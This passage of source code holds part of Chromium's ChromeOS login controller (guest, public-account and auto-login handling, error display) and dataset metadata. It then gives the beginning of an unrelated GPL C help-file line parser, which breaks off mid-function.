  login_performer_.reset(new LoginPerformer(this));
  is_login_in_progress_ = true;
  login_performer_->LoginRetailMode();
  AccessibilityManager::Get()->MaybeSpeak(
      l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_DEMOUSER));
}
// Starts an off-the-record (guest) session, but only after device settings
// are verified trusted and the AllowGuest policy permits it. NOTE: this
// method re-invokes itself via the PrepareTrustedValues callback while
// verification is pending.
void ExistingUserController::LoginAsGuest() {
  if (is_login_in_progress_ || UserManager::Get()->IsUserLoggedIn())
    return;
  // Stop the auto-login timer when attempting login.
  StopPublicSessionAutoLoginTimer();
  // Disable clicking on other windows.
  login_display_->SetUIEnabled(false);
  CrosSettingsProvider::TrustedStatus status =
      cros_settings_->PrepareTrustedValues(
          base::Bind(&ExistingUserController::LoginAsGuest,
                     weak_factory_.GetWeakPtr()));
  // Must not proceed without signature verification.
  if (status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
    login_display_->ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, 1,
                              HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
    // Reenable clicking on other windows and status area.
    login_display_->SetUIEnabled(true);
    StartPublicSessionAutoLoginTimer();
    display_email_.clear();
    return;
  } else if (status != CrosSettingsProvider::TRUSTED) {
    // Value of AllowNewUser setting is still not verified.
    // Another attempt will be invoked after verification completion.
    return;
  }
  bool allow_guest;
  cros_settings_->GetBoolean(kAccountsPrefAllowGuest, &allow_guest);
  if (!allow_guest) {
    // Disallowed. The UI should normally not show the guest pod but if for some
    // reason this has been made available to the user here is the time to tell
    // this nicely.
    login_display_->ShowError(IDS_LOGIN_ERROR_WHITELIST, 1,
                              HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
    // Reenable clicking on other windows and status area.
    login_display_->SetUIEnabled(true);
    StartPublicSessionAutoLoginTimer();
    display_email_.clear();
    return;
  }
  // Only one instance of LoginPerformer should exist at a time.
  login_performer_.reset(NULL);
  login_performer_.reset(new LoginPerformer(this));
  is_login_in_progress_ = true;
  login_performer_->LoginOffTheRecord();
  AccessibilityManager::Get()->MaybeSpeak(
      l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_OFFRECORD));
}
void ExistingUserController::MigrateUserData(const std::string& old_password) {
// LoginPerformer instance has state of the user so it should exist.
if (login_performer_.get())
login_performer_->RecoverEncryptedData(old_password);
}
// Starts a public (device-local) account session for |username| once device
// policy is verified trusted. NOTE: re-invokes itself via the
// PrepareTrustedValues callback while verification is pending.
void ExistingUserController::LoginAsPublicAccount(
    const std::string& username) {
  if (is_login_in_progress_ || UserManager::Get()->IsUserLoggedIn())
    return;
  // Stop the auto-login timer when attempting login.
  StopPublicSessionAutoLoginTimer();
  // Disable clicking on other windows.
  login_display_->SetUIEnabled(false);
  CrosSettingsProvider::TrustedStatus status =
      cros_settings_->PrepareTrustedValues(
          base::Bind(&ExistingUserController::LoginAsPublicAccount,
                     weak_factory_.GetWeakPtr(),
                     username));
  // If device policy is permanently unavailable, logging into public accounts
  // is not possible.
  if (status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
    login_display_->ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, 1,
                              HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
    // Re-enable clicking on other windows.
    login_display_->SetUIEnabled(true);
    return;
  }
  // If device policy is not verified yet, this function will be called again
  // when verification finishes.
  if (status != CrosSettingsProvider::TRUSTED)
    return;
  // If there is no public account with the given |username|, logging in is not
  // possible.
  const User* user = UserManager::Get()->FindUser(username);
  if (!user || user->GetType() != User::USER_TYPE_PUBLIC_ACCOUNT) {
    // Re-enable clicking on other windows.
    login_display_->SetUIEnabled(true);
    StartPublicSessionAutoLoginTimer();
    return;
  }
  // Only one instance of LoginPerformer should exist at a time.
  login_performer_.reset(NULL);
  login_performer_.reset(new LoginPerformer(this));
  is_login_in_progress_ = true;
  login_performer_->LoginAsPublicAccount(username);
  AccessibilityManager::Get()->MaybeSpeak(
      l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_PUBLIC_ACCOUNT));
}
// Marks the sign-in screen as ready, which is a precondition for the
// public-session auto-login timer (see StartPublicSessionAutoLoginTimer()).
void ExistingUserController::OnSigninScreenReady() {
  signin_screen_ready_ = true;
  StartPublicSessionAutoLoginTimer();
}
// Called when the user focuses a different pod: drop the stale performer and
// restart the attempt counter.
void ExistingUserController::OnUserSelected(const std::string& username) {
  login_performer_.reset(NULL);
  num_login_attempts_ = 0;
}
// Kicks off an async ownership check; the result decides whether the
// enrollment screen may be shown (see OnEnrollmentOwnershipCheckCompleted()).
void ExistingUserController::OnStartEnterpriseEnrollment() {
  DeviceSettingsService::Get()->GetOwnershipStatusAsync(
      base::Bind(&ExistingUserController::OnEnrollmentOwnershipCheckCompleted,
                 weak_factory_.GetWeakPtr()));
}
// Queries the consumer kiosk-mode status; the kiosk-enable screen is shown
// only if the device turns out to be configurable (see the callback).
void ExistingUserController::OnStartKioskEnableScreen() {
  KioskAppManager::Get()->GetConsumerKioskModeStatus(
      base::Bind(&ExistingUserController::OnConsumerKioskModeCheckCompleted,
                 weak_factory_.GetWeakPtr()));
}
// UI request to start the factory-reset flow.
void ExistingUserController::OnStartDeviceReset() {
  ShowResetScreen();
}
// UI request to show the kiosk auto-launch confirmation screen.
void ExistingUserController::OnStartKioskAutolaunchScreen() {
  ShowKioskAutolaunchScreen();
}
void ExistingUserController::ResyncUserData() {
// LoginPerformer instance has state of the user so it should exist.
if (login_performer_.get())
login_performer_->ResyncEncryptedData();
}
// Caches the email to display for the in-flight attempt; cleared after each
// success/failure so it cannot leak into later attempts.
void ExistingUserController::SetDisplayEmail(const std::string& email) {
  display_email_ = email;
}
void ExistingUserController::ShowWrongHWIDScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kWrongHWIDScreenName, params.Pass());
login_display_->OnFadeOut();
}
// Sign-out is meaningless on the login screen; this delegate method must
// never be reached here.
void ExistingUserController::Signout() {
  NOTREACHED();
}
// Result handler for the consumer kiosk-mode status query started in
// OnStartKioskEnableScreen(): the enable screen is shown only for devices
// that can still be configured for consumer kiosk mode.
void ExistingUserController::OnConsumerKioskModeCheckCompleted(
    KioskAppManager::ConsumerKioskModeStatus status) {
  if (status != KioskAppManager::CONSUMER_KIOSK_MODE_CONFIGURABLE)
    return;
  ShowKioskEnableScreen();
}
// Decides whether the enrollment screen may be shown based on ownership
// status. NOTE: for owned devices this re-invokes itself via the
// PrepareTrustedValues callback while settings verification is pending.
void ExistingUserController::OnEnrollmentOwnershipCheckCompleted(
    DeviceSettingsService::OwnershipStatus status,
    bool current_user_is_owner) {
  if (status == DeviceSettingsService::OWNERSHIP_NONE) {
    ShowEnrollmentScreen(false, std::string());
  } else if (status == DeviceSettingsService::OWNERSHIP_TAKEN) {
    // On a device that is already owned we might want to allow users to
    // re-enroll if the policy information is invalid.
    CrosSettingsProvider::TrustedStatus trusted_status =
        CrosSettings::Get()->PrepareTrustedValues(
            base::Bind(
                &ExistingUserController::OnEnrollmentOwnershipCheckCompleted,
                weak_factory_.GetWeakPtr(),
                status, current_user_is_owner));
    if (trusted_status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
      ShowEnrollmentScreen(false, std::string());
    }
  } else {
    // OwnershipService::GetStatusAsync is supposed to return either
    // OWNERSHIP_NONE or OWNERSHIP_TAKEN.
    NOTREACHED();
  }
}
void ExistingUserController::ShowEnrollmentScreen(bool is_auto_enrollment,
const std::string& user) {
scoped_ptr<DictionaryValue> params;
if (is_auto_enrollment) {
params.reset(new DictionaryValue());
params->SetBoolean("is_auto_enrollment", true);
params->SetString("user", user);
}
host_->StartWizard(WizardController::kEnrollmentScreenName,
params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowResetScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kResetScreenName, params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowKioskEnableScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kKioskEnableScreenName, params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowKioskAutolaunchScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kKioskAutolaunchScreenName,
params.Pass());
login_display_->OnFadeOut();
}
// Locks the sign-in UI and shows the fatal TPM error screen.
void ExistingUserController::ShowTPMError() {
  login_display_->SetUIEnabled(false);
  login_display_->ShowErrorScreen(LoginDisplay::TPM_ERROR);
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, LoginPerformer::Delegate implementation:
//
// LoginPerformer failure callback: routes the failure to the user flow, a
// special screen (safe-mode restart, TPM error, password-changed) or a
// user-visible error, then resets the flow and notifies the consumer.
void ExistingUserController::OnLoginFailure(const LoginFailure& failure) {
  is_login_in_progress_ = false;
  offline_failed_ = true;
  guest_mode_url_ = GURL::EmptyGURL();
  std::string error = failure.GetErrorString();
  // A custom user flow may fully consume the failure.
  if (UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
          HandleLoginFailure(failure)) {
    return;
  }
  if (failure.reason() == LoginFailure::OWNER_REQUIRED) {
    ShowError(IDS_LOGIN_ERROR_OWNER_REQUIRED, error);
    // Restart the UI after a delay by asking the session manager to stop the
    // session.
    content::BrowserThread::PostDelayedTask(
        content::BrowserThread::UI, FROM_HERE,
        base::Bind(&SessionManagerClient::StopSession,
                   base::Unretained(DBusThreadManager::Get()->
                       GetSessionManagerClient())),
        base::TimeDelta::FromMilliseconds(kSafeModeRestartUiDelayMs));
  } else if (failure.reason() == LoginFailure::TPM_ERROR) {
    ShowTPMError();
  } else if (!online_succeeded_for_.empty()) {
    // Online auth succeeded but offline failed: the password likely changed.
    ShowGaiaPasswordChanged(online_succeeded_for_);
  } else {
    // Check networking after trying to login in case user is
    // cached locally or the local admin account.
    bool is_known_user =
        UserManager::Get()->IsKnownUser(last_login_attempt_username_);
    if (!ConnectivityStateHelper::Get()->IsConnected()) {
      if (is_known_user)
        ShowError(IDS_LOGIN_ERROR_AUTHENTICATING, error);
      else
        ShowError(IDS_LOGIN_ERROR_OFFLINE_FAILED_NETWORK_NOT_CONNECTED, error);
    } else {
      // TODO(nkostylev): Cleanup rest of ClientLogin related code.
      if (failure.reason() == LoginFailure::NETWORK_AUTH_FAILED &&
          failure.error().state() ==
              GoogleServiceAuthError::HOSTED_NOT_ALLOWED) {
        ShowError(IDS_LOGIN_ERROR_AUTHENTICATING_HOSTED, error);
      } else {
        if (!is_known_user)
          ShowError(IDS_LOGIN_ERROR_AUTHENTICATING_NEW, error);
        else
          ShowError(IDS_LOGIN_ERROR_AUTHENTICATING, error);
      }
    }
    // Reenable clicking on other windows and status area.
    login_display_->SetUIEnabled(true);
    login_display_->ClearAndEnablePassword();
    StartPublicSessionAutoLoginTimer();
  }
  // Reset user flow to default, so that special flow will not affect next
  // attempt.
  UserManager::Get()->ResetUserFlow(last_login_attempt_username_);
  if (login_status_consumer_)
    login_status_consumer_->OnLoginFailure(failure);
  // Clear the recorded displayed email so it won't affect any future attempts.
  display_email_.clear();
}
// LoginPerformer success callback: caches what is needed from the performer,
// releases it to finish its own lifetime, and hands off to profile
// preparation (which calls OnProfilePrepared() when done).
void ExistingUserController::OnLoginSuccess(
    const UserContext& user_context,
    bool pending_requests,
    bool using_oauth) {
  is_login_in_progress_ = false;
  offline_failed_ = false;
  login_display_->set_signin_completed(true);
  StopPublicSessionAutoLoginTimer();
  bool has_cookies =
      login_performer_->auth_mode() == LoginPerformer::AUTH_MODE_EXTENSION &&
      user_context.auth_code.empty();
  // Login performer will be gone so cache this value to use
  // once profile is loaded.
  password_changed_ = login_performer_->password_changed();
  // LoginPerformer instance will delete itself once online auth result is OK.
  // In case of failure it'll bring up ScreenLock and ask for
  // correct password/display error message.
  // Even in case when following online,offline protocol and returning
  // requests_pending = false, let LoginPerformer delete itself.
  login_performer_->set_delegate(NULL);
  // Intentional ownership release: the performer manages its own deletion.
  ignore_result(login_performer_.release());
  // Will call OnProfilePrepared() in the end.
  LoginUtils::Get()->PrepareProfile(user_context,
                                    display_email_,
                                    using_oauth,
                                    has_cookies,
                                    false,  // Start session for user.
                                    this);
  display_email_.clear();
  // Notify LoginDisplay to allow it provide visual feedback to user.
  login_display_->OnLoginSuccess(user_context.username);
}
// Called once the user's profile has been loaded: either launches the browser
// directly or, for new users, routes through the post-login wizard screens.
void ExistingUserController::OnProfilePrepared(Profile* profile) {
  OptionallyShowReleaseNotes(profile);
  // Reenable clicking on other windows and status area.
  login_display_->SetUIEnabled(true);
  if (UserManager::Get()->IsCurrentUserNew() &&
      !UserManager::Get()->GetCurrentUserFlow()->ShouldSkipPostLoginScreens() &&
      !WizardController::default_controller()->skip_post_login_screens()) {
    // Don't specify start URLs if the administrator has configured the start
    // URLs via policy.
    if (!SessionStartupPref::TypeIsManaged(profile->GetPrefs()))
      InitializeStartUrls();
// Debug-only escape hatch to skip the post-login OOBE screens.
#ifndef NDEBUG
    if (CommandLine::ForCurrentProcess()->HasSwitch(
            chromeos::switches::kOobeSkipPostLogin)) {
      LoginUtils::Get()->DoBrowserLaunch(profile, host_);
      host_ = NULL;
    } else {
#endif
      // Mark the device as registered, i.e. the second part of OOBE as
      // completed.
      if (!StartupUtils::IsDeviceRegistered())
        StartupUtils::MarkDeviceRegistered();
      ActivateWizard(WizardController::kTermsOfServiceScreenName);
#ifndef NDEBUG
    }
#endif
  } else {
    LoginUtils::Get()->DoBrowserLaunch(profile, host_);
    host_ = NULL;
  }
  // Inform |login_status_consumer_| about successful login. Set most
  // parameters to empty since they're not needed.
  if (login_status_consumer_) {
    login_status_consumer_->OnLoginSuccess(UserContext(),
                                           false,   // pending_requests
                                           false);  // using_oauth
  }
  login_display_->OnFadeOut();
}
// Guest (off-the-record) login success callback: marks OOBE done and hands
// session completion to LoginUtils, forwarding |guest_mode_url_| if set.
void ExistingUserController::OnOffTheRecordLoginSuccess() {
  is_login_in_progress_ = false;
  offline_failed_ = false;
  // Mark the device as registered, i.e. the second part of OOBE as completed.
  if (!StartupUtils::IsDeviceRegistered())
    StartupUtils::MarkDeviceRegistered();
  LoginUtils::Get()->CompleteOffTheRecordLogin(guest_mode_url_);
  if (login_status_consumer_)
    login_status_consumer_->OnOffTheRecordLoginSuccess();
}
// LoginPerformer callback for a detected cryptohome password mismatch: shows
// the password-changed recovery dialog. NOTE: re-invokes itself via the
// PrepareTrustedValues callback while settings verification is pending.
void ExistingUserController::OnPasswordChangeDetected() {
  is_login_in_progress_ = false;
  offline_failed_ = false;
  // Must not proceed without signature verification.
  if (CrosSettingsProvider::TRUSTED != cros_settings_->PrepareTrustedValues(
          base::Bind(&ExistingUserController::OnPasswordChangeDetected,
                     weak_factory_.GetWeakPtr()))) {
    // Value of owner email is still not verified.
    // Another attempt will be invoked after verification completion.
    return;
  }
  // A custom user flow may fully consume the event.
  if (UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
          HandlePasswordChangeDetected()) {
    return;
  }
  // True if user has already made an attempt to enter old password and failed.
  bool show_invalid_old_password_error =
      login_performer_->password_changed_callback_count() > 1;
  // Note: We allow owner using "full sync" mode which will recreate
  // cryptohome and deal with owner private key being lost. This also allows
  // us to recover from a lost owner password/homedir.
  // TODO(gspencer): We shouldn't have to erase stateful data when
  // doing this. See http://crosbug.com/9115 http://crosbug.com/7792
  login_display_->ShowPasswordChangedDialog(show_invalid_old_password_error);
  if (login_status_consumer_)
    login_status_consumer_->OnPasswordChangeDetected();
  display_email_.clear();
}
// Called when |email| is rejected by the device whitelist: surfaces the error
// and reports a WHITELIST_CHECK_FAILED failure to the consumer.
void ExistingUserController::WhiteListCheckFailed(const std::string& email) {
  is_login_in_progress_ = false;
  offline_failed_ = false;
  ShowError(IDS_LOGIN_ERROR_WHITELIST, email);
  // Reenable clicking on other windows and status area.
  login_display_->SetUIEnabled(true);
  login_display_->ShowSigninUI(email);
  if (login_status_consumer_) {
    login_status_consumer_->OnLoginFailure(LoginFailure(
        LoginFailure::WHITELIST_CHECK_FAILED));
  }
  display_email_.clear();
  StartPublicSessionAutoLoginTimer();
}
// Called when device policy could not be loaded for the attempt: shows the
// owner-key-lost error and returns the UI to an idle state.
void ExistingUserController::PolicyLoadFailed() {
  ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, "");
  // Reenable clicking on other windows and status area.
  is_login_in_progress_ = false;
  offline_failed_ = false;
  login_display_->SetUIEnabled(true);
  display_email_.clear();
  // Policy load failure stops login attempts -- restart the timer.
  StartPublicSessionAutoLoginTimer();
}
// Result of the online authentication check for |username|. A successful
// online check combined with an earlier offline failure means the cryptohome
// password no longer matches the GAIA password, so the password-changed flow
// is triggered (once the in-flight attempt, if any, has finished).
void ExistingUserController::OnOnlineChecked(const std::string& username,
                                             bool success) {
  // Ignore failed checks and results for a different (stale) username.
  if (!success || last_login_attempt_username_ != username)
    return;
  online_succeeded_for_ = username;
  // Wait for login attempt to end, if it hasn't yet.
  if (offline_failed_ && !is_login_in_progress_)
    ShowGaiaPasswordChanged(username);
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, private:
void ExistingUserController::ActivateWizard(const std::string& screen_name) {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(screen_name, params.Pass());
}
// Re-reads the device-local-account auto-login policy and (re)arms or stops
// the auto-login timer accordingly.
void ExistingUserController::ConfigurePublicSessionAutoLogin() {
  std::string auto_login_account_id;
  cros_settings_->GetString(kAccountsPrefDeviceLocalAccountAutoLoginId,
                            &auto_login_account_id);
  const std::vector<policy::DeviceLocalAccount> device_local_accounts =
      policy::GetDeviceLocalAccounts(cros_settings_);
  // Map the policy account id to the corresponding user id, if any.
  public_session_auto_login_username_.clear();
  for (std::vector<policy::DeviceLocalAccount>::const_iterator
           it = device_local_accounts.begin();
       it != device_local_accounts.end(); ++it) {
    if (it->account_id == auto_login_account_id) {
      public_session_auto_login_username_ = it->user_id;
      break;
    }
  }
  // Only an existing public-account user is eligible for auto-login.
  const User* user =
      UserManager::Get()->FindUser(public_session_auto_login_username_);
  if (!user || user->GetType() != User::USER_TYPE_PUBLIC_ACCOUNT)
    public_session_auto_login_username_.clear();
  // Missing delay setting means "log in immediately" (0 ms).
  if (!cros_settings_->GetInteger(
          kAccountsPrefDeviceLocalAccountAutoLoginDelay,
          &public_session_auto_login_delay_)) {
    public_session_auto_login_delay_ = 0;
  }
  if (!public_session_auto_login_username_.empty())
    StartPublicSessionAutoLoginTimer();
  else
    StopPublicSessionAutoLoginTimer();
}
// Restarts the public-session auto-login countdown (e.g. on user activity),
// but only when the timer exists and is currently running — an idle timer
// must stay idle.
void ExistingUserController::ResetPublicSessionAutoLoginTimer() {
  if (!auto_login_timer_ || !auto_login_timer_->IsRunning())
    return;
  StopPublicSessionAutoLoginTimer();
  StartPublicSessionAutoLoginTimer();
}
// Timer callback: performs the policy-configured public-session auto-login.
void ExistingUserController::OnPublicSessionAutoLoginTimerFire() {
  // These invariants are guaranteed by StartPublicSessionAutoLoginTimer(),
  // which refuses to arm the timer unless all of them hold.
  CHECK(signin_screen_ready_ &&
        !is_login_in_progress_ &&
        !public_session_auto_login_username_.empty());
  LoginAsPublicAccount(public_session_auto_login_username_);
}
// Cancels a pending public-session auto-login, if one is scheduled.
void ExistingUserController::StopPublicSessionAutoLoginTimer() {
  if (auto_login_timer_)
    auto_login_timer_->Stop();
}
// Arms (or re-arms) the one-shot timer that fires public-session
// auto-login after |public_session_auto_login_delay_| milliseconds.
// No-op unless the sign-in screen is ready, no login is in flight, and an
// auto-login account is configured.
void ExistingUserController::StartPublicSessionAutoLoginTimer() {
  if (!signin_screen_ready_ ||
      is_login_in_progress_ ||
      public_session_auto_login_username_.empty()) {
    return;
  }

  // Start the auto-login timer; the timer object is created lazily and
  // reused across restarts.
  if (!auto_login_timer_)
    auto_login_timer_.reset(new base::OneShotTimer<ExistingUserController>);
  auto_login_timer_->Start(
      FROM_HERE,
      base::TimeDelta::FromMilliseconds(
          public_session_auto_login_delay_),
      base::Bind(
          &ExistingUserController::OnPublicSessionAutoLoginTimerFire,
          weak_factory_.GetWeakPtr()));
}
// Returns the native window of the hosting LoginDisplayHost.
gfx::NativeWindow ExistingUserController::GetNativeWindow() const {
  return host_->GetNativeWindow();
}
// Collects the URLs to open after sign-in (demo-mode policy URLs, or the
// ChromeVox tutorial when spoken feedback is on) and either appends them
// as command-line args or suppresses the default browser window when the
// Getting Started guide will be shown instead.
void ExistingUserController::InitializeStartUrls() const {
  std::vector<std::string> start_urls;

  const base::ListValue *urls;
  bool can_show_getstarted_guide = true;
  if (UserManager::Get()->IsLoggedInAsDemoUser()) {
    if (CrosSettings::Get()->GetList(kStartUpUrls, &urls)) {
      // The retail mode user will get start URLs from a special policy if it is
      // set.
      for (base::ListValue::const_iterator it = urls->begin();
           it != urls->end(); ++it) {
        std::string url;
        if ((*it)->GetAsString(&url))
          start_urls.push_back(url);
      }
    }
    can_show_getstarted_guide = false;
  // Skip the default first-run behavior for public accounts.
  } else if (!UserManager::Get()->IsLoggedInAsPublicAccount()) {
    if (AccessibilityManager::Get()->IsSpokenFeedbackEnabled()) {
      // Substitute the user's lower-cased UI locale into the tutorial URL.
      const char* url = kChromeVoxTutorialURLPattern;
      PrefService* prefs = g_browser_process->local_state();
      const std::string current_locale =
          StringToLowerASCII(prefs->GetString(prefs::kApplicationLocale));
      std::string vox_url = base::StringPrintf(url, current_locale.c_str());
      start_urls.push_back(vox_url);
      can_show_getstarted_guide = false;
    }
  }

  ServicesCustomizationDocument* customization =
      ServicesCustomizationDocument::GetInstance();
  if (!ServicesCustomizationDocument::WasApplied() &&
      customization->IsReady()) {
    // Since we don't use OEM start URL anymore, just mark as applied.
    customization->ApplyCustomization();
  }

  // Only show getting started guide for a new user.
  const bool should_show_getstarted_guide =
      UserManager::Get()->IsCurrentUserNew();

  if (can_show_getstarted_guide && should_show_getstarted_guide) {
    // Don't open default Chrome window if we're going to launch the GS app.
    // Because we don't want the GS app to be hidden in the background.
    CommandLine::ForCurrentProcess()->AppendSwitch(::switches::kSilentLaunch);
  } else {
    for (size_t i = 0; i < start_urls.size(); ++i) {
      CommandLine::ForCurrentProcess()->AppendArg(start_urls[i]);
    }
  }
}
// Updates the kChromeOSReleaseNotesVersion pref, which gates whether
// release notes are shown after login. Skipped entirely in kiosk mode or
// when the current user flow skips post-login screens.
void ExistingUserController::OptionallyShowReleaseNotes(
    Profile* profile) const {
  // TODO(nkostylev): Fix WizardControllerFlowTest case.
  if (!profile || KioskModeSettings::Get()->IsKioskModeEnabled())
    return;
  if (UserManager::Get()->GetCurrentUserFlow()->ShouldSkipPostLoginScreens())
    return;
  PrefService* prefs = profile->GetPrefs();
  chrome::VersionInfo version_info;
  // New users would get this info with default getting started guide.
  // In password changed case 2 options are available:
  // 1. Cryptohome removed, pref is gone, not yet synced, recreate
  //    with latest version.
  // 2. Cryptohome migrated, pref is available. To simplify implementation
  //    update version here too. Unlikely that user signs in first time on
  //    the machine after update with password changed.
  if (UserManager::Get()->IsCurrentUserNew() || password_changed_) {
    prefs->SetString(prefs::kChromeOSReleaseNotesVersion,
                     version_info.Version());
    return;
  }

  std::string prev_version_pref =
      prefs->GetString(prefs::kChromeOSReleaseNotesVersion);
  Version prev_version(prev_version_pref);
  // An unset or malformed pref is treated as "before any release".
  if (!prev_version.IsValid())
    prev_version = Version("0.0.0.0");
  Version current_version(version_info.Version());

  if (!current_version.components().size()) {
    NOTREACHED() << "Incorrect version " << current_version.GetString();
    return;
  }

  // No "Release Notes" content yet for upgrade from M19 to later release.
  if (prev_version.components()[0] >= kReleaseNotesTargetRelease)
    return;

  // Otherwise, trigger on major version change.
  if (current_version.components()[0] > prev_version.components()[0]) {
    prefs->SetString(prefs::kChromeOSReleaseNotesVersion,
                     current_version.GetString());
  }
}
// Shows the localized login error |error_id| on the login display,
// pairing it with a help topic derived from the last authentication
// error. |details| carries low-level, non-localized diagnostics and is
// only logged.
void ExistingUserController::ShowError(int error_id,
                                       const std::string& details) {
  // TODO(dpolukhin): show detailed error info. |details| string contains
  // low level error info that is not localized and even is not user friendly.
  // For now just ignore it because error_text contains all required information
  // for end users, developers can see details string in Chrome logs.
  VLOG(1) << details;

  HelpAppLauncher::HelpTopic help_topic_id;
  bool is_offline = !ConnectivityStateHelper::Get()->IsConnected();
  switch (login_performer_->error().state()) {
    case GoogleServiceAuthError::CONNECTION_FAILED:
      help_topic_id = HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT_OFFLINE;
      break;
    case GoogleServiceAuthError::ACCOUNT_DISABLED:
      help_topic_id = HelpAppLauncher::HELP_ACCOUNT_DISABLED;
      break;
    case GoogleServiceAuthError::HOSTED_NOT_ALLOWED:
      help_topic_id = HelpAppLauncher::HELP_HOSTED_ACCOUNT;
      break;
    default:
      // Prefer the offline variant of the generic topic when disconnected.
      help_topic_id = is_offline ?
          HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT_OFFLINE :
          HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT;
      break;
  }

  login_display_->ShowError(error_id, num_login_attempts_, help_topic_id);
}
// Starts the "Gaia password changed" flow for |username| after marking
// the user's OAuth token invalid.
void ExistingUserController::ShowGaiaPasswordChanged(
    const std::string& username) {
  // Invalidate OAuth token, since it can't be correct after password is
  // changed.
  UserManager::Get()->SaveUserOAuthStatus(
      username,
      User::OAUTH2_TOKEN_STATUS_INVALID);

  login_display_->SetUIEnabled(true);
  login_display_->ShowGaiaPasswordChanged(username);
}
} // namespace chromeos
|
C++
|
BSD-3-Clause-No-Nuclear-License-2014
|
hujiajie/pa-chromium/chrome/browser/chromeos/login/existing_user_controller.cc
|
e692f421-f4dd-4c71-a885-684292f9dbf1
|
[{"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 42191, "end": 42198, "context": "ev_version.IsValid())\n prev_version = Version(\"0.0.0.0\");\n Version current_version(version_info.Version"}]
|
[{"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 42191, "end": 42198, "context": "ev_version.IsValid())\n prev_version = Version(\"0.0.0.0\");\n Version current_version(version_info.Version"}]
|
/*
Helpparse.c - help file parser.
Copyright (C) 2000 Imre Leber
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
If you have any questions, comments, suggestions, or fixes please
email me at: imre.leber@worldonline.be
*/
#include <stdlib.h>
#include <string.h>
#include "hlpread.h"
static size_t AmofLines;          /* number of lines in the parsed help file */
static char* EmptyString = "";    /* shared sentinel for empty lines; never free()d */
static char** HelpSysData = NULL; /* array of AmofLines line pointers, or NULL */
/* Counts the lines in the bufsize-byte buffer RawData.  A CRLF pair is
   treated as a single line break; N breaks delimit N+1 lines, so a
   buffer with no break at all still counts as one line. */
static size_t CountLines(char* RawData, size_t bufsize)
{
    size_t breaks = 0;
    size_t pos;

    for (pos = 0; pos < bufsize; pos++)
    {
        if (RawData[pos] == '\n')
            breaks++;
        else if (RawData[pos] == '\r')
        {
            breaks++;
            if ((pos + 1 < bufsize) && (RawData[pos + 1] == '\n'))
                pos++;            /* swallow the LF of a CRLF pair */
        }
    }

    return breaks + 1;
}
/*
 * Extracts the next line from <input> into *slot as a freshly malloc()ed,
 * NUL-terminated string (the shared EmptyString sentinel is stored for
 * empty lines).  <restinbuf> is the number of bytes remaining in the
 * buffer.  Returns a pointer just past the consumed line break (or to the
 * end of the buffer), or NULL when malloc() fails.
 *
 * Fixes over the previous version:
 *  - the loop checks restinbuf BEFORE dereferencing *p, and the
 *    terminator skip honors the buffer end, so the function no longer
 *    reads past the caller's buffer;
 *  - only a "\r\n" pair is consumed as one break.  Previously the
 *    character after a bare '\n' was also inspected and a following '\n'
 *    skipped, which silently merged empty lines even though CountLines()
 *    counts them, desynchronizing ParseHelpFile()'s slot accounting.
 */
static char* GetNextLine(char* input, char** slot, int restinbuf)
{
    char* p = input;
    int len;

    while (restinbuf && (*p != '\r') && (*p != '\n'))
    {
        p++;
        restinbuf--;
    }

    len = (int)(p - input);
    if (len)
    {
        if ((*slot = (char*) malloc(len+1)) == NULL)
            return NULL;

        memcpy(*slot, input, len);
        (*slot)[len] = '\0';
    }
    else
        *slot = EmptyString;

    if (!restinbuf)                    /* end of buffer: nothing to skip */
        return p;
    if ((*p == '\r') && (restinbuf > 1) && (*(p+1) == '\n'))
        return p + 2;                  /* CRLF counts as a single break */
    return p + 1;
}
/*
 * Splits the raw help file contents (bufsize bytes at RawData) into
 * NUL-terminated lines stored in the module-level HelpSysData array
 * (AmofLines entries).  Returns HELPSUCCESS, or HELPMEMINSUFFICIENT when
 * an allocation fails, in which case all partial allocations are
 * released and HelpSysData is reset to NULL.
 */
int ParseHelpFile(char* RawData, size_t bufsize)
{
    size_t i, j;   /* size_t to match AmofLines (was int: sign-compare) */
    char* input = RawData;

    AmofLines = CountLines(RawData, bufsize);

    if ((HelpSysData = (char**) malloc(AmofLines * sizeof(char*))) == NULL)
        return HELPMEMINSUFFICIENT;

    for (i = 0; i < AmofLines; i++)
    {
        input = GetNextLine(input, &HelpSysData[i],
                            (int)(bufsize - (input - RawData)));
        if (!input)
        {
            /* FIX: skip the shared EmptyString sentinel during cleanup;
